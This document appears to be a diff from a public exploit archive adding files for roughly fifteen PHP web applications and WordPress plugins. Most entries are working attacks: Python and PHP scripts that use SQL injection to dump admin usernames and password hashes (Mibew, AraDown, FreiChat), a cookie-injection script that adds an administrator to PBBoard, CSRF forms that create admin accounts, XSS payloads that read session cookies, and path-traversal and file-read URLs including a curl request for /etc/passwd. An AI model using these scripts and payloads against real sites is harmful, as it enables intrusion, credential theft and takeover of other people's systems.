Dir2web is prone to multiple security vulnerabilities, including an SQL-Injection vulnerability and an information-disclosure vulnerability.
Successfully exploiting these issues allows remote attackers to compromise the software, retrieve information, modify data, disclose sensitive information, or gain unauthorized access; other attacks are also possible.
Dir2web versions 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?wpid=homepage&oid=6a303a0aaa&apos; OR id > 0-- -

117
platforms/php/webapps/37582.py Executable file
View file

@ -0,0 +1,117 @@
source: http://www.securityfocus.com/bid/54857/info
Mibew Messenger is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Mibew Messenger 1.6.4 is vulnerable; other versions may also be affected.
#!/usr/bin/python
#Author: Ucha Gobejishvili
#Timeline: 2012-08-05 Bug Discovered
# 2012-08-05 Public Disclosured
#Vendor: Mibew Web Messenger (http://mibew.org/ )
#Version: Mibew Messenger 1.6.4
#Demo: http://demo.mibew.org
#Introduction:
#Mibew Messenger (also known as Open Web Messenger) is an open-#source live
support application written in PHP and MySQL. It #enables one-on-one chat
assistance in real-time directly from #your website.
#Abstract:
#Discovered SQL injection Vulnerabilities on the Mibew Messenger #v.1.6.4.
A SQL Injection vulnerability is detected on the Mibew #Messenger v.1.6.4
The vulnerabilities allows an remote attacker #to execute own sql commands
on the affected applicationdbms. #Successful exploitation can result in
dbms, web-server or #application compromise.
# python Mibew.py -p localhost:8080 -t localhost:8500 -d /Patch/
import sys, httplib, urllib2, urllib, re
from optparse import OptionParser
usage = "./%prog [<options>] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -t localhost:8500 -d
/coldcal/"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory",
help="Directory path to the CMS")
(options, args) = parser.parse_args()
def banner():
print "\n\t|
----------------------------------------------------------- |"
print "\t| Mibew Web Messenger SQL Injection Vulnerability|"
print "\t| |\n"
if len(sys.argv) < 5:
banner()
parser.print_help()
sys.exit(1)
def getProxy():
try:
pr = httplib.HTTPConnection(options.proxy)
pr.connect()
proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
except(socket.timeout):
print "\n(-) Proxy Timed Out"
sys.exit(1)
except(),msg:
print "\n(-) Proxy Failed"
sys.exit(1)
return proxy_handler
def setTargetHTTP():
if options.target[0:7] != 'http://':
options.target = "http://" + options.target
return options.target
def getRequest(exploit):
if options.proxy:
try:
proxyfier = urllib2.build_opener(getProxy())
check = proxyfier.open(options.target+options.directory+exploit).read()
except urllib2.HTTPError, error:
check = error.read()
except socket.error:
print "(-) Proxy connection failed"
sys.exit(1)
else:
try:
req = urllib2.Request(options.target+options.directory+exploit)
check = urllib2.urlopen(req).read()
except urllib2.HTTPError, error:
check = error.read()
except urllib2.URLError:
print "(-) Target connection failed, check your address"
sys.exit(1)
return check
basicInfo = {'user: ':'user_name()', 'name: ':'db_name()', 'hostname:
':'host_name()','version: \n\n\t':'@@version'}
def basicSploit(info):
return "/operator/threadprocessor.php?threadid=1+and+1=convert(int," + info
+ ")--"
if __name__ == "__main__":
banner()
options.target = setTargetHTTP()
print "(+) Exploiting target @: %s" % (options.target+options.directory)
if options.proxy:
print "\n(+) Testing Proxy..."
print "(+) Proxy @ %s" % (options.proxy)
print "(+) Building Handler.."
for key in basicInfo:
getResp = getRequest(basicSploit(basicInfo[key]))
if re.findall("the nvarchar value '", getResp):
dbInfo = getResp.split('the nvarchar value '')[1].split('' to data type
int')[0]
print "\n(!) Found database %s%s" % (key, dbInfo.rstrip())

7
platforms/php/webapps/37583.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/54859/info
YT-Videos Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/demo/ytvideos/play.php?id=2'

10
platforms/php/webapps/37584.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/54861/info
TCExam is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Versions prior to TCExam 11.3.008 are vulnerable.
http://www.example.com/admin/code/tce_edit_answer.php?subject_module_id
http://www.example.com/admin/code/tce_edit_answer.php?question_subject_id

9
platforms/php/webapps/37585.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54861/info
TCExam is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Versions prior to TCExam 11.3.008 are vulnerable.
http://www.example.com/admin/code/tce_edit_question.php?subject_module_id

99
platforms/php/webapps/37586.php Executable file
View file

@ -0,0 +1,99 @@
source: http://www.securityfocus.com/bid/54862/info
PBBoard is a web-based messaging board application implemented in PHP.
Attackers may exploit these issues to gain unauthorized access to user accounts or to bypass intended security restrictions. Other attacks may also be possible.
PBBoard versions prior to 2.1.4 are vulnerable.
http://drupal.org/node/207891
<?
/*
+ Application : Power Bulletin Board < 2.1.4
| Download : pbboard.com
| By Faris , AKA i-Hmx
| n0p1337@gmail.com
+ sec4ever.com , 1337s.cc
Time line :
> 14/7/2012 , Vulnerability discovered
> 30/7/2012 , Vendor Reported
> 31/7/2012 , patch released
> 01/8/2012 , Public disclosure
engine/engine.class.php
$this->_CONF['admin_username_cookie'] = 'PowerBB_admin_username';
$this->_CONF['admin_password_cookie'] = 'PowerBB_admin_password';
admin/common.module.php
if (!empty($username)
and !empty($password))
{
$CheckArr = array();
$CheckArr['username'] = $username;
$CheckArr['password'] = $password;
$CheckMember = $PowerBB->member->CheckAdmin($CheckArr);
if ($CheckMember != false)
{
$PowerBB->_CONF['rows']['member_row'] = $CheckMember;
$PowerBB->_CONF['member_permission'] = true;
}
else
{
$PowerBB->_CONF['member_permission'] = false;
}
}
Function CheckAdmin is called from
engine/systyms/member.class.php
go deeper and deeper till u find the vulnerable query
this can be used to bypass login rules as cookies are not sanitized before being called for login confirmation
*/
echo "\n+-------------------------------------------+\n";
echo "| PBulletin Board < 2.1.4 |\n";
echo "| Auth Bypass vuln / Admin add Exploit |\n";
echo "| By i-Hmx |\n";
echo "| n0p1337@gmail.com |\n";
echo "+-------------------------------------------+\n";
echo "\n| Enter Target # ";
function get($url,$post,$cookies){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,"http://".$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl,CURLOPT_COOKIE,$cookies);
//curl_setopt($curl, CURLOPT_REFERER, $reffer);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
curl_setopt($curl, CURLOPT_HEADER, true);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
function kastr($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
$vic=str_replace('http://','',trim(fgets(STDIN)));
if($vic==''){exit();}
$log=fopen('faris.txt','w+');
$ran=rand(10000,20000);
echo "| Adding New User\n";
$add=get($vic.'/admin.php?page=member&add=1&start=1',"username=f4ris_$ran&password=sec4ever1337s&email=n0p1337_$ran@gmail.com&gender=m&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82","PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
$myid=kastr($add,'main=1&id=','">');
if($myid==''){exit("| Exploitation Failed\n - Magic_Quotes Maybe on or wrong path\n+ Exit");}
echo "| User Data :\n + UserName : f4ris_$ran\n + Password : sec4ever1337s\n + User ID : $myid\n";
echo "| Updating User privileges\n";
$update=get($vic."admin.php?page=member&edit=1&start=1&id=$myid","username=f4ris_$ran&new_username=f4ris_$ran&new_password=sec4ever1337s&email=n0p1337_$ran@gmail.com&usergroup=1&gender=m&style=1&lang=1&avater_path=&user_info=&user_title=F4r54wy&posts=0&website=sec4ever.com&month=0&day=0&year=&user_country=&ip=&warnings=0&reputation=10&hide_online=0&user_time=&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=1&user_sig=&review_subject=0&review_reply=0&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82","PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
echo "+ Exploitatin Done ;)\n";
exit();
?>

9
platforms/php/webapps/37587.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54866/info
GetSimple is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
GetSimple 3.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/cms/admin/filebrowser.php?path=[LFI]

194
platforms/php/webapps/37588.txt Executable file
View file

@ -0,0 +1,194 @@
# Exploit Title: CSRF, Unrestricted File Upload, Privilege escalation & XSS
# Google Dork: intitle: CSRF, Unrestricted File Upload, Privilege
escalation & XSS
# Date: 2015-07-12
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: phpsqlitecms.net
# Software Link: phpsqlitecms.net/download
# Version: ilosuna-phpsqlitecms-d9b8219
# Tested on: windows 7 SP1
# Category: Web apps CMS
Vendor:
================================
phpsqlitecms.net
Product:
================================
ilosuna-phpsqlitecms-d9b8219
Advisory Information:
==============================================================================
CSRF, Unrestricted File type upload, Privilege escalation & XSS
Vulnerabilities.
User will be affected if they visit a malicious website or click any
infected link.
Possibly resulting in malicious attackers taking control of the Admin / CMS
area.
Vulnerability Details:
=====================
CSRF:
-----
We can add arbitrary users to the system, delete arbitrary web server files
and escalate privileges, as no CSRF token is present.
Add arbitrary user:
-------------------
The following request variables are all that is needed to add users to
system.
mode = users
new_user_submitted = true
name = "hyp3rlinx"
pw = "12345"
pw_r = "12345"
Privilege escalation:
---------------------
Under users area in admin we can easily gain admin privileges, again using
CSRF vulnerability we
submit form using our id and change request variable to type '1' granting
us admin privileges.
e.g.
mode:users
edit_user_submitted:true
id:3
name:hyp3rlinx
new_pw:
new_pw_r:
type:1 <------make us admin
Delete arbitrary files:
------------------------
The following request parameters are all we is need to delete files from
media or files directorys
under the web servers CMS area.
mode=filemanager
directory=files
delete=index.html
confirmed=true
XSS:
-----
We can steal PHP session cookie via XSS vulnerability
Unrestricted File Type Upload:
------------------------------
The files & media dirs will happily take .PHP, .EXE etc... and PHP scripts
when selected will execute
whatever PHP script we upload.
Exploit code(s):
===============
1- CSRF POC Add arbitrary users to the system.
---------------------------------------------
<script>
function doit(){
var e=document.getElementById('evil')
e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="evil" action="
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php"
method="post">
<input type="text" name="mode" value="users"/>
<input type="text" name="new_user_submitted" value="true"/>
<input type="text" name="name" value="hyp3rlinx" />
<input type="text" name="pw" value="abc123" />
<input type="text" name="pw_r" value="abc123" />
</form>
2- CSRF privilege escalation POST URL:
--------------------------------------
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php
Privilege escalation request string:
------------------------------------
mode=users&edit_user_submitted=true&id=3&name=hyp3rlinx&new_pw=&new_pw_r=&type=1
3- CSRF Delete Aribitary Server Files:
--------------------------------------
Below request URL will delete the index.html file in files dir on web
server without any type
of request validation CSRF token etc.
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=filemanager
&directory=files&delete=index.html&confirmed=true
XSS steal PHP session ID POC:
-----------------------------
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=comments&type=0&
edit=49&comment_id="/><script>alert('XSS by hyp3rlinx
'%2bdocument.cookie)</script>&page=1
Disclosure Timeline:
=========================================================
Vendor Notification: NA
July 12, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST & GET
Vulnerable Product: [+] ilosuna-phpsqlitecms-d9b8219
Vulnerable Parameter(s): [+] comment_id, delete, type,
new_user_submitted
Affected Area(s): [+] Admin & CMS
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
(hyp3rlinx)

9
platforms/php/webapps/37590.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54887/info
PHPList is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
PHPList 2.10.18 is vulnerable; other versions may also be affected.
http://www.example.com/admin/?page=user&find=1&unconfirmed=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E

79
platforms/php/webapps/37591.php Executable file
View file

@ -0,0 +1,79 @@
source: http://www.securityfocus.com/bid/54891/info
AraDown is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
<?php
echo "
_____ _ _ _____ _____ _______
/ ___| | | | | / _ \ / ___/|__ __|
| | _ | |__| | | | | | | |___ | |
| | | | | __ | | | | | \___ \ | |
| |_| | | | | | | |_| | ___| | | |
\_____/ |_| |_| \_____/ /_____/ |_|
____ _ _____ _____ _____ ___ ___
| _ \ | | / _ \ / _ \ | _ \ \ \ / /
| |_) | | | | | | | | | | | | | | \ \ \/ /
| _ ( | | | | | | | | | | | | | | \ /
| |_) | | |___ | |_| | | |_| | | |_| / | |
|____/ |_____| \_____/ \_____/ |_____/ |__|
[*]-----------------------------------------------------------------------[*]
# Exploit Title : ArDown (All Version) <- Remote Blind SQL Injection
# Google Dork : 'powered by AraDown'
# Date : 08/07/2012
# Exploit Author : G-B
# Email : g22b@hotmail.com
# Software Link : http://aradown.info/
# Version : All Version
[*]-----------------------------------------------------------------------[*]
[*] Target -> ";
$target = stdin();
$ar = array('1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
echo "[*] Username : ";
for($i=1;$i<=30;$i++){
foreach($ar as $char){
$b = send('http://server',"3' and (select substr(username,$i,1) from aradown_admin)='$char' # ");
if(eregi('<span class="on_img" align="center"></span>',$b) && $char == 'z'){
$i = 50;
break;
}
if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
echo $char;
break;
}
}
echo "\n[*] Password : ";
for($i=1;$i<=32;$i++){
foreach($ar as $char){
$b = send('http://server',"3' and (select substr(password,$i,1) from aradown_admin)='$char' # ");
if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
echo $char;
break;
}
}
function send($target,$query){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"$target/ajax_like.php");
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,array('id'=>$query));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$r = curl_exec($ch);
curl_close($ch);
return $r;
}
function stdin(){
$fp = fopen("php://stdin","r");
$line = trim(fgets($fp));
fclose($fp);
return $line;
}
?>

85
platforms/php/webapps/37592.php Executable file
View file

@ -0,0 +1,85 @@
/*
# Exploit Title: FreiChat 9.6 SQL Injection
# Date: 27-11-2014
# Software Link: http://codologic.com/page/freichat-free-php-chat-script-software
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
$_GET['time'] is not escaped.
File: freichat\server\plugins\chatroom\chatroom.php
$get_mesg = $this->get_messages($_GET['time']);
public function get_messages($time) {
$frm_id = $this->frm_id;
$result = array();
if ($time == 0) {
//$get_mesg_query = "SELECT DISTINCT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . "AND time<2 order by time";
} else {
$get_mesg_query = "SELECT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . " AND time>" . $time . " AND message_type<>1 order by time ";
$result = $this->db->query($get_mesg_query)->fetchAll();
}
return $result;
}
http://security.szurek.pl/freichat-96-sql-injection.html
2. Proof of Concept
Example for WordPress integration (it will give you admin password):
*/
<?php
/*
* Kacper Szurek
* http://security.szurek.pl
*/
function hack($url, $cookie, $sql ){
$ckfile = dirname(__FILE__) . $cookie;
$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$content = curl_exec($ch);
if (preg_match('|http://(.*?)/freichat/client/main\.php\?id=([a-zA-Z0-9]+)&xhash=([a-zA-Z0-9]+)|i', $content, $matches)) {
curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=getmembers&id='.$matches[2].'&xhash='.$matches[3]);
$content = curl_exec($ch);
curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=loadchatroom&id='.$matches[2].'&xhash='.$matches[3].'&in_room=1&chatroom_mesg_time=1&custom_mesg=1&time='.urlencode($sql));
$content = curl_exec($ch);
if (preg_match('|"room_id":"([^"]+)"|', $content, $output)) {
echo "WordPress password user ID=1: ".$output[1];
} else {
echo "FAIL";
}
}
curl_close( $ch );
}
// URL to WordPress main URL
$url = "http://wp/";
// SQL Payload
$sql = "1 UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, user_pass FROM wp_users WHERE ID=1 -- ";
$cookie = "/cookie.txt";
hack($url, $cookie, $sql);

25
platforms/php/webapps/37594.txt Executable file
View file

@ -0,0 +1,25 @@
## In The Name Of ALLAH ##
# title : Arabportal 3 SQL injection vulnerability
# Exploit Title: Arabportal 3 registeration section SQL injection vulnerability
# Google Dork: inurl:members.php?action=signup
# Date: 2015/07/10 (july 10th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: www.arabportal.net
# Software Link: www.arabportal.net
# Version: 3
# Tested on: linux
# greetings : VIRkid, b0x, phantom_x, Ch3rn0by1
members.php?action=singup
POST parameter "showemail" is vulnerable to error based SQLi attack
................................................................................
1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady
video : https://youtu.be/5nFblYE90Vk
good luck

25
platforms/php/webapps/37595.txt Executable file
View file

@ -0,0 +1,25 @@
## In The Name Of ALLAH ##
# Exploit Title: phpVibe ALL versions LFD vulnerability
# Google Dork: "powered by phpvibe"
# Date: 2015/07/13 (july 13th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: http://www.phpvibe.com/
# Software Link: http://get.phpvibe.com/
# Version: All versions
# Tested on: linux
# greetings : VIRkid, b0x, phantom_x, Ch3rn0by1
stream.php
====================================
$token = htmlspecialchars(base64_decode(base64_decode($_GET["file"])));
file parameter has no validation and sanitization!
exploition can be performed by adding "@@media" to the file name and base64 it two times as below (no registration needed):
http://domain.tld/stream.php?file=../vibe_config.php@@media ==> http://domain.tld/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09
=====================================

131
platforms/php/webapps/37596.txt Executable file
View file

@ -0,0 +1,131 @@

ArticleFR 3.0.6 CSRF Add Admin Exploit
Vendor: Free Reprintables
Product web page: http://www.freereprintables.com
Affected version: 3.0.6
Summary: A lightweight fully featured content (article / video)
management system. Comes with a pluginable and multiple module
framework system.
Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user
visits a malicious web site.
Tested on: nginx/1.6.2
PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5248
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5248.php
21.06.2015
--
<html>
<body>
<form action="http://127.0.0.1/dashboard/users/create/" method="POST">
<input type="hidden" name="username" value="thricer" />
<input type="hidden" name="name" value="The_Hacker" />
<input type="hidden" name="password" value="s3cr3t" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="website" value="http://www.zeroscience.mk" />
<input type="hidden" name="blog" value="zsl" />
<input type="hidden" name="membership" value="admin" />
<input type="hidden" name="isactive" value="active" />
<input type="hidden" name="submit" value="Create" />
<input type="submit" value="Request" />
</form>
</body>
</html>
##################################################################
ArticleFR 3.0.6 Multiple Script Injection Vulnerabilities
Vendor: Free Reprintables
Product web page: http://www.freereprintables.com
Affected version: 3.0.6
Summary: A lightweight fully featured content (article / video)
management system. Comes with a pluginable and multiple module
framework system.
Desc: ArticleFR suffers from multiple stored cross-site scripting
vulnerabilities. The issues are triggered when input passed via the
POST parameter 'name' in Categories, POST parameters 'title' and
'rel' in Links and GET parameter 'url' in PingServers module is
not properly sanitized before being returned to the user. This can
be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.
Tested on: nginx/1.6.2
PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5247
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5247.php
21.06.2015
--
POST 'name' Categories Stored XSS:
----------------------------------
<html>
<body>
<form action="http://127.0.0.1/dashboard/settings/categories/" method="POST">
<input type="hidden" name="name" value='"><script>alert(1)</script>' />
<input type="hidden" name="parent" value="0" />
<input type="hidden" name="submit" value="Add" />
<input type="submit" value="XSS #1" />
</form>
</body>
</html>
POST 'title', 'rel' Links Stored XSS:
------------------------------------
<html>
<body>
<form action="http://127.0.0.1/dashboard/settings/links/" method="POST">
<input type="hidden" name="title" value='"><script>alert(2)</script>' />
<input type="hidden" name="url" value="http://www.zeroscience.mk" />
<input type="hidden" name="rel" value='"><script>alert(3)</script>' />
<input type="hidden" name="submit" value="Add" />
<input type="submit" value="XSS #2 and #3" />
</form>
</body>
</html>
POST 'url' Ping Server Reflected XSS:
-------------------------------------
<html>
<body>
<form action="http://127.0.0.1/dashboard/tools/pingservers/" method="POST">
<input type="hidden" name="url" value='http://www.zeroscience.mk"><script>alert(4)</script>' />
<input type="hidden" name="submit" value="Add" />
<input type="submit" value="XSS #4" />
</form>
</body>
</html>

40
platforms/php/webapps/37601.txt Executable file
View file

@ -0,0 +1,40 @@
Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files:
50 $file = urldecode($args['file']) ;
51 $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;
52
53 while (!feof($fh))
54 $txt .= fread($fh, 1024) ;
55
56 // Clean up the temporary file - permissions
57 // may prevent this from succeedeing so use the '@'
58 // to suppress any messages from PHP.
59
60 @unlink($file) ;
61 }
62
63 $filename = urldecode($args['filename']) ;
64 $contenttype = urldecode($args['contenttype']) ;
65
66 // Tell browser to expect a text file of some sort (usually txt or csv)
67
68 header(sprintf('Content-Type: application/%s', $contenttype)) ;
69 header(sprintf('Content-disposition: attachment; filename=%s', $filename)) ;
70 print $txt ;
CVEID:
OSVDB:
Exploit Code:
• $ curl "http://server/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"

70
platforms/php/webapps/37602.txt Executable file
View file

@ -0,0 +1,70 @@
Vulnerability: SQL Injection, Reflected XSS, Path Traversal
Affected Software: ZenPhoto (http://www.zenphoto.org/)
Affected Version: 1.4.8 (probably also prior versions)
Patched Version: 1.4.9
Risk: Medium
Vendor Contacted: 2015-05-18
Vendor Fix: 2015-07-09
Public Disclosure: 2015-07-10
SQL Injection
=============
There are multiple second order error based SQL injections into the
ORDER BY keyword in the admin area.
- visit zp-core/admin-options.php?saved&tab=gallery
alternatively visit zp-core/admin-options.php?saved&tab=image
- Set "Sort gallery by" to "Custom"
- set custom fields to "id,extractvalue(0x0a,concat(0x0a,(select
version())))%23"
- visit zp-core/admin-upload.php?page=upload&tab=http&type=images
- alternatively, visiting either of these will also trigger the injection:
/
zp-core/admin-edit.php
zp-core/admin-users.php?page=users
zp-core/admin-themes.php
The result is only directly displayed if the server is configured to
report errors, but it can also be seen in the logfile located at
zp-core/admin-logs.php?page=logs
XSS 1
=====
http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?error=%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B
http://localhost/zenphoto-zenphoto-1.4.8/zp-core/utilities/backup_restore.php?compression=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B
The payload must first be HTML entity-encoded, and then URL encoded.
XSS 2
=====
http://localhost/zenphoto-security-fixes/zp-core/admin.php?action=external&error="
onmouseover="alert('xsstest')" foo="bar&msg=hover over me!
Directory Traversal
===================
For an admin, it is possible to view and edit any PHP or inc files, not
just the ones inside the theme directory.
http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-themes-editor.php?theme=../../../../../var/www&file=secret.php
Execute Function
================
An admin user can execute any function they want via this URL (there is
no CSRF protection for it):
localhost/zenphoto-security-fixes/zp-core/admin.php?action=phpinfo
This gives up some control over the control flow of the site, which
might cause problems, especially considering the missing of CSRF protection.
Source
======
http://software-talk.org/blog/2015/07/second-order-sql-injection-reflected-xss-path-traversal-function-execution-vulnerability-zenphoto/

93
platforms/php/webapps/37603.txt Executable file
View file

@ -0,0 +1,93 @@
# Title: Cross-Site Request Forgery, Cross-Site Scripting and SQL Injection
in CP Contact Form with Paypal Wordpress Plugin v1.1.5
# Submitter: Nitin Venkatesh
# Product: CP Contact Form with Paypal Wordpress Plugin
# Product URL: https://wordpress.org/plugins/cp-contact-form-with-paypal/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site
scripting[CWE-79], Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection')[CWE-89]
# Affected Versions: v1.1.5 and possibly below.
# Tested versions: v1.1.5
# Fixed Version: v1.1.6
# Link to code diff:
https://plugins.trac.wordpress.org/changeset?new=1166955%40cp-contact-form-with-paypal&old=1162550%40cp-contact-form-with-paypal
# Changelog:
https://wordpress.org/plugins/cp-contact-form-with-paypal/changelog/
# CVE Status: None/Unassigned/Fresh
## Product Information:
With CP Contact Form with Paypal you can insert a contact form into a
WordPress website and connect it to a PayPal payment.
## Vulnerability Description:
The forms in the admin area of the plugin allows CSRF. This gives the
capacity for the attacker to add new forms, modify existing form settings,
launch XSS attacks, export CSV files of the messages, delete forms, and
perform SQL Injection.
## Proof of Concept:
<h3>CSRF - Action Links</h3>
<ul>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&a=1&r=0.9305673889626347&name=csrf1">Create
form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=2&list=1&search=&dfrom=&dto=&cal=2&cp_contactformpp_csv=Export+to+CSV">Export
to CSV</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&c=2&r=0.4520871591860098">
Clone form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&u=6&r=0.558320934244582&name=csrf1">Update
form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&d=3&r=0.2828470980050731">Delete
form/item</a></li>
</ul>
<h3>CSRF, XSS, SQLi - Settings form</h3>
<form action="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=11&r=0.81280830806042"
method="post">
<input type="hidden" name="cp_contactformpp_post_options" value='' />
<!--
if cp_contactformpp_id is injected with XSS, the other script vectors won't
work
<input type="hidden" name="cp_contactformpp_id"
value='"><script>alert(3);</script>' />
SQL injection possible cp_contactformpp_id
<input type="hidden" name="cp_contactformpp_id" value="1 AND SLEEP(25)" />
-->
